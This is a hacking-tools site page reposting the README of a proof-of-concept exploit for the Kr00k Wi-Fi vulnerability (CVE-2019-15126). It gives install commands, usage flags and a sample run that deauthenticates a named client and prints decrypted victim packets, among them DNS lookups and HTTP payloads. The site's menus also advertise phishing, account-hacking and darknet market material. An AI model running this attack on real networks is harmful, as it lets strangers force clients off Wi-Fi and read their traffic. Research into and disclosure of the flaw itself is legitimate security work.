• Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Menu
  • Home
  • Become a Hacker
    • Get Started
    • Hacker Mindset
    • Roadmap
    • Simple Setup – Hacker 101
    • Types of Hackers
    • Recommended Courses
  • Boot People Offline
  • Courses
    • All Hacking Courses
    • Cyber Security School
  • CTF
    • Beginners to Advanced Guide
    • Create your own CTF box
    • Field and Resources Guide
    • Platforms & Wargames
    • Tools Used for Solving CTF
    • Writeups
  • Dark Web
    • Beginners Guide
    • Darknet Markets
    • Darkweb 101 (Anonymity Guide)
    • Dark Web OSINT Tools
    • Hacking Forums
    • Latest News
    • Onion Links
  • Hacker Gadgets
  • Hacking Books
  • Tools Directory
Search
Close
  • Home
  • 2020
  • March
  • 31
  • R00Kie-Kr00Kie – PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability

R00Kie-Kr00Kie – PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability

March 31, 2020 Comments Off on R00Kie-Kr00Kie – PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability
R00Kie-Kr00Kie - PoC Exploit For The CVE-2019-15126 Kr00K Vulnerability cybersecurity ethical hacking hack android hack app hack wordpress hacker news hacking hacking tools for windows keylogger kit kitploit password brute force penetration testing pentest pentest android pentest linux pentest toolkit pentest tools spy tool kit spyware tools

[*]

Disclaimer
This is a PoC exploit for the CVE-2019-15126 kr00k vulnerability.
This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials.

Requirements
To use these scripts, you will need a WiFi card supporting the active monitor mode with frame injection. We recommend the Atheros AR9280 chip (IEEE 802.11n) we used to develop and test the code. We have tested this PoC on Kali Linux

Installation

# clone main repo
git clone https://github.com/hexway/r00kie-kr00kie.git && cd ./r00kie-kr00kie
# install dependencies
sudo pip3 install -r requirements.txt

How to use

Script: r00kie-kr00kie.py
This is the main exploit file that implements the kr00k attack

->~:python3 r00kie-kr00kie.py -h

usage: r00kie-kr00kie.py [-h] [-i INTERFACE] [-l CHANNEL] [-b BSSID]
[-c CLIENT] [-n DEAUTH_NUMBER] [-d DEAUTH_DELAY]
[-p PCAP_PATH_READ] [-r PCAP_PATH_RESULT] [-q]

PoC of CVE-2019-15126 kr00k vulnerability

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Set wireless interface name for listen packets
-l CHANNEL, --channel CHANNEL
Set channel for wireless interface (default: 1)
-b BSSID, --bssid BSSID
Set WiFi AP BSSID (example: "01:23:45:67:89:0a")
-c CLIENT, --client CLIENT
Set WiFi client MAC address (example:
"01:23:45:67:89:0b")
-n DEAUTH_NUMBER, --deauth_number DEAUTH_NUMBER
Set numb er of deauth packets for one iteration
(default: 5)
-d DEAUTH_DELAY, --deauth_delay DEAUTH_DELAY
Set delay between sending deauth packets (default: 5)
-p PCAP_PATH_READ, --pcap_path_read PCAP_PATH_READ
Set path to PCAP file for read encrypted packets
-r PCAP_PATH_RESULT, --pcap_path_result PCAP_PATH_RESULT
Set path to PCAP file for write decrypted packets
-q, --quiet Minimal output

In order to start an attack, you need to know bssid of access points, its channel and mac address of the victim. You can find them using the airodump-ng wlan0 utility.
Run the exploit:

->~:python3 r00kie-kr00kie.py -i wlan0 -b D4:38:9C:82:23:7A -c 88:C9:D0:FB:88:D1 -l 11

/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ $$| $$$$ $$| $$$$ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$ $$$$| $$ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ $$| $$ $$$| $$ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ $$| $$| $$$$$$$
|__/ |__/ ______/ ______/ |__/ __/|__/ _______/



/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$ $$| $$$$ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ __/| $$ $$$$| $$ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ $$$| $$ $$$| $$_ $$ | $ $| $$_____/
| $$ $$| $$ | $$$$$$/| $$$$$$/| $$ $$| $$| $$$$$$$
|__/ __/|__/ ______/ ______/ |__/ __/|__/ _______/
v0.0.1

https://hexway.io/research/r00kie-kr00kie/

[!] Kill processes that prevent monitor mode!
[*] Wireless interface: wlan0 already in mode monitor
[*] Set channel: 11 on wireless interface: wlan0
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[*] Send 5 deauth packets to: 88:C9:D0:FB:88:D1 from: D4:38:9C:82:23:7A
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30074
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce1
src = 192.168.43.161
dst = 8.8.4.4
options
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0xa649
###[ DNS ]###
id = 55281
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
qd
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = A
| qclass = IN
an = None
ns = None
ar = None

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 30075
flags = DF
frag = 0
ttl = 64
proto = udp
chksum = 0xcce0
src = 192.168.43.161
dst = 8.8.4.4
options
###[ UDP ]###
sport = 60744
dport = domain
len = 40
chksum = 0x104b
###[ DNS ]###
id = 28117
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
qd
|###[ DNS Question Record ]###
| qname = 'g.whatsapp.net.'
| qtype = AAAA
| qclass = IN
an = None
ns = None
ar = None

Also, if you have already intercepted traffic (pcap file) after the kr00t attack, you can decrypt:

->~:python3 r00kie-kr00kie.py -p encrypted_packets.pcap

/$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$__ $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ $$| $$$$ $$| $$$$ $$| $$ /$$ /$$ /$$$$$$
| $$$$$$$/| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$__ $$| $$ $$$$| $$ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$ $$| $$ $$$| $$ $$$| $$_ $$ | $$| $$_____/
| $$ | $$| $$$$$$/| $$$$$$/| $$ $$| $$| $$$$$$$
|__/ |__/ ______/ ______/ |__/ __/|__/ _______/



/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$ $$| $$$$ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ __/| $$ $$$$| $$ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ $$$| $$ $$$| $$_ $$ | $$| $$_____/
| $$ $$| $$ | $$$$$$/| $$$$$$/| $$ $$| $$| $$$$$$$
|__/ __/|__/ ______/ ______/ |__/ __/|__/ _______/
v0.0.1

https://hexway.io/research/r00kie-kr00kie/

[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
options
###[ TCP ]###
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
load = 'POST /post_form.html HTTP/1.1rnHost: sfdsfsdf:1337rnConnection: keep-alivernContent-Length: 138240rnOrigin: http://sfdsfsdf.ch:1337rnUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36rnContent-Type: application/jsonrnAccept: */*rnReferer: http://sfdsfsdf.ch:1337/post_form.htmlrnAccept-Encoding: gzip, deflaternAccept-Language: en-US,en;q=0.9,ru;q=0.8r nrn'

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
options
###[ TCP ]###
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
options
###[ TCP ]###
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follo w all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"

[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
options
###[ TCP ]###
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]

[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap

Script: traffic_generator.py
This script generates UDP traffic from the victim, to demonstrate the kr00k attack

->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit
Download R00Kie-Kr00Kie

Post navigation

VPN Use is Surging Due to COVID-19
Awspx – A Graph-Based Tool For Visualizing Effective Access And Resource Relationships In AWS Environments

Related Articles

PowerProxy - PowerShell SOCKS Proxy With Reverse Proxy Capabilities

PowerProxy – PowerShell SOCKS Proxy With Reverse Proxy Capabilities

- Hack Tools
May 19, 2022
Researchers created a PoC exploit for Safari CVE-2022-26717 bug

Researchers created a PoC exploit for Safari CVE-2022-26717 bug

- Hack Tools
May 19, 2022
logdata-anomaly-miner v2.5.1 releases: parses log data and allows to define analysis pipelines for anomaly detection

logdata-anomaly-miner v2.5.1 releases: parses log data and allows to define analysis pipelines for anomaly detection

- Hack Tools
May 19, 2022
hacker gadgets
hacker phone covers

Recent Posts

PowerProxy - PowerShell SOCKS Proxy With Reverse Proxy Capabilities

PowerProxy – PowerShell SOCKS Proxy With Reverse Proxy Capabilities

May 19, 2022
Researchers created a PoC exploit for Safari CVE-2022-26717 bug

Researchers created a PoC exploit for Safari CVE-2022-26717 bug

May 19, 2022
logdata-anomaly-miner v2.5.1 releases: parses log data and allows to define analysis pipelines for anomaly detection

logdata-anomaly-miner v2.5.1 releases: parses log data and allows to define analysis pipelines for anomaly detection

May 19, 2022
Paris: Versus Market Exploit “is Real”

Paris: Versus Market Exploit “is Real”

May 19, 2022
Cyph - Cryptographically Secure Messaging And Social Networking Service

Cyph – Cryptographically Secure Messaging And Social Networking Service

May 19, 2022
Australian Police Arrest Two Alleged Darkweb Vendors

Australian Police Arrest Two Alleged Darkweb Vendors

May 18, 2022

Social Media Hacking

SocialPath – Track users across Social Media Platforms

SocialPath – Track users across Social Media Platforms

- Social Media Hacking
October 16, 2019October 16, 2019

SocialPath is a django application for gathering social media intelligence on specific username. It checks for Twitter, Instagram, Facebook, Reddit...

SocialScan – Check Email Address and Username Availability on Online Platforms

SocialScan – Check Email Address and Username Availability on Online Platforms

June 17, 2019
Shellphish – Phishing Tool For 18 Social Media Apps

Shellphish – Phishing Tool For 18 Social Media Apps

June 10, 2019July 27, 2019
WhatsApp Hacking using QRLJacking

WhatsApp Hacking using QRLJacking

May 2, 2019May 19, 2019
How to Hack any Facebook Account with Z-Shadow

How to Hack any Facebook Account with Z-Shadow

April 26, 2019June 29, 2020
hacker buffs
ABOUT US

Haxf4rall is a collective, a good starting point and provides a variety of quality material for cyber security professionals.

Our primary focus revolves around the latest tools released in the Infosec community and provide a platform for developers to showcase their skillset and current projects.

COMPANY
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Menu
  • Contact Us
  • Disclaimer
  • Hacker Gadgets
  • LANC Remastered
  • PCPS IP Puller
  • Privacy Policy
  • Sitemap
  • Submit your Tool
Live Chat
RESOURCES
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Menu
  • Attack Process
  • Become a Hacker
  • Career Pathways
  • Dark Web
  • Hacking Books
  • Practice Your Skills
  • Recommended Courses
  • Simple Setup – Hacker 101
Get Started
TOOLBOX
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Menu
  • Anonymity
  • Bruteforce
  • DoS – Denial of Service
  • Information Gathering
  • Phishing
  • SQL Injection
  • Vulnerability Scanners
  • Wifi Hacking
Tools Directory

2014 – 2020 | Haxf4rall.com               Stay Connected:

Facebook Twitter Google-plus Wordpress
Please wait...

Join Our Community

Subscribe now and get your free HACKERS HANDBOOK

Don't Worry ! You will not be spammed
SIGN UP FOR NEWSLETTER NOW